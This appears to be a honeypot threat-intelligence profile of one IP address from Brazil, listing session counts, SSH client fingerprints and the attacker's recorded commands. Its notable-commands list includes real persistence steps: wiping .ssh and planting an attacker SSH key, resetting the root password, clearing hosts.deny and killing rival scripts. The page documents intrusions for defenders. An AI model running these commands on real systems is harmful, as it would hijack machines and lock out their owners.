← Back to feed
189.18.37.112
Location
🇧🇷 BR / São Bernardo do Campo
ASN
AS27699 · TELEFONICA BRASIL S.A
Cloud Provider
—
Total Events
397
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-07 16:59 — 2026-04-07 18:44
Attack Types
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
45 (18 with login)
Avg Depth Score
0.49
Commands Executed
47
Files Downloaded
11
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
- cat /proc/cpuinfo | grep name | wc -l
- echo "root:xXzTN59XKgBe"|chpasswd|bash
- rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
- cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
- free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
- ls -lh $(which ls)
- which ls
Fingerprints
HASSH
SSH Client
Evidence Timeline
Credential Harvester
3bd9030d0f43
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
a8830a4c456e
15%
Loading events...
Credential Harvester
aaae15e43c57
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
5d66bdd2c7e2
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Scanner
e71eb5d40ca7
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
bdebd46be679
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Opportunistic Bruter
0eee871d023d
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
b2bdbce62e22
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Credential Harvester
58dbda1e5100
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
bd2837ea26fd
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
1a7fd5e4f616
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
64f69fdae260
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
b57a0aa81393
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
9633e3e1dfe7
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
b87aa851efeb
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
059fda039862
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
7ffc3ab25e23
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
801e4a549a57
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Opportunistic Bruter
f54270c3c54a
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
e1589c278b6b
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Credential Harvester
01bc6663e06d
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
5dd7e3490b54
LOGIN
20
2
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:xXzTN59XKgBe"|chpasswd|bash
Opportunistic Bruter
d4b70ffc38b8
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
deeab0fa3ba4
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
0f3736f79df8
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
d609fdc31c90
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
1a8668245e17
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Malware Dropper
53a2872f5667
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
1313ecf21459
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
6f2e6550dc85
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
d9bd1149258e
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
a98e0c77409d
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
c2fb13db6eb3
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
40089636f91b
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
5611aff19b0c
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
074a9172d4ab
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Malware Dropper
abcbb2819b0d
LOGIN
3
1
1
100%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
5608111efadb
LOGIN
1
50%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
74cda324d5c3
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
71a47d8622ed
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
f63c0aac0659
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
96aa71f55a9a
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
326f1604fc2d
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Scanner
243d7343df1f
15%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1
Credential Harvester
6a48ea94a230
1
35%
Loading events...
HASSH 03a80b21afa8106…
SSH-2.0-libssh_0.11.1